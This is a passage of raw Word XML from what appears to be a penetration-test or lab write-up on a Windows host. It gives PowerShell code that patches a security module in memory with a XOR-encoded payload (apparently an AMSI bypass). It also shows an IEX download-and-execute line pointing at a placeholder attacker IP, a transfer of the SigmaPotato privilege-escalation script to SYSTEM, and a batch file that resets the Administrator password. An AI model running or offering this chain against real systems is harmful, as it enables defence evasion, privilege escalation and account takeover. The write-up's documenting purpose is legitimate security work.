    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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0E">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0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function Apply-CodeUpdate {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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[Parameter(Mandatory=$true)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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$VirtualProtectFunc,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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[Parameter(Mandatory=$true)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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$TargetAddress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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$StatusCode =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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">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$ProtectionFlags = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="c5221f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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$Size = [uint32]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="c5221f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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$Success = $VirtualProtectFunc.Invoke($TargetAddress, [UIntPtr]$Size, $ProtectionFlags, [ref]$StatusCode)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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1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if</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-not $Success) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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throw </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Failed to change memory protection"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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$EncryptedPayload = [Byte[]] (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="c5221f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0xDD</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0x21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0x61</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0x74</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0xE9</w:t>
      </w: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c5221f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0xB5</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$XorKey = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"evasive"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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$Payload = Decode-XORPayload -EncryptedPayload $EncryptedPayload -XorKey $XorKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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[System.Runtime.InteropServices.Marshal]::Copy($Payload, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="c5221f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, $TargetAddress, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="c5221f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6</w:t>
      </w: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26">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$Success</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">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28">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129">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function Invoke-SecurityCheck {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">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try {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">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$SystemClass = Initialize-SystemHelper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">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$VirtualProtectFunc = Get-VirtualProtectDelegate -SystemClass $SystemClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">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$SecurityModule = Load-SecurityModule -SystemClass $SystemClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">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$FunctionAddress = Get-FunctionAddress -SystemClass $SystemClass -SecurityModule $SecurityModule</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">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Apply-CodeUpdate -VirtualProtectFunc $VirtualProtectFunc -TargetAddress $FunctionAddress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">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$true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">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2">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catch {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">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Write-Error </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Security check failed: $_"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="1967d2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> $false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">
      <w:pPr>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136">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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b w:val="0"/>
          <w:bCs w:val="0"/>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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this purpose, the file was executed through a direct in-memory code invocation method, using the iex command.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">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A">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="b80672"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IEX</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37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(New-Object</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System.Net.WebClient).DownloadString(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://&lt;your-ip/bypass.ps1"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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41300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="74" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2413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3D">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3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executing the script directly in memory, the function responsible for running the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-SecurityCheck</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module was called.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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The command returned </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TRUE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> twice, indicating successful execution and completion of the procedure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">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825500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="75"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943600" cy="825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2">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From that point forward, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SigmaPotato</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> script was transferred from the local machine to the compromised host to proceed with privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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The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.ps1</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 file was transferred using the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curl</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 command in PowerShell after being hosted on a simple HTTP server configured with Python.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">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6">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curl</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&lt;vpn-ip&gt;/Invoke-SigmaPotato.ps1</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Invoke-SigmaPotato.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">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143000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="76"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5943600" cy="11430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A">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054100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="78" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="10541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4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Since the script was in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.ps1</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format, the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SigmaPotato.ps1</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file was imported into the environment to allow for in-memory execution.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">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4E">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.\Invoke-SigmaPotato.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">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5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4500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="79"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943600" cy="4445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1">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i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="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From this point, it was only necessary to execute the module, triggering it with a </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whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command call to validate the execution.</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54">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Invoke-SigmaPotato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-Command</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"whoami"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">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5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87600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="80"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5943600" cy="2387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5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5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59">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5A">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>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Upon analyzing the output of the</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 whoami</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command, the context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NT AUTHORITY\SYSTEM</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was identified, confirming that the execution occurred with elevated privileges.</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This clearly demonstrated the success of the privilege escalation process, resulting in administrative access to the system.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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BM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>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Access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</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user was obtained, characterizing the maximum privilege level on the system.</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From this point, it became feasible to execute a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.bat</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file with the objective of changing the password of the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administrator user itself.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">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5E">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Set-Content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password.bat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color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">net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user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Administrator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NovaSenha123!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015F">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6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0200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="81"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5943600" cy="3302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1">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After the creation of the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.bat</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file, the password change script was provided as an argument to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SigmaPotato</w:t>
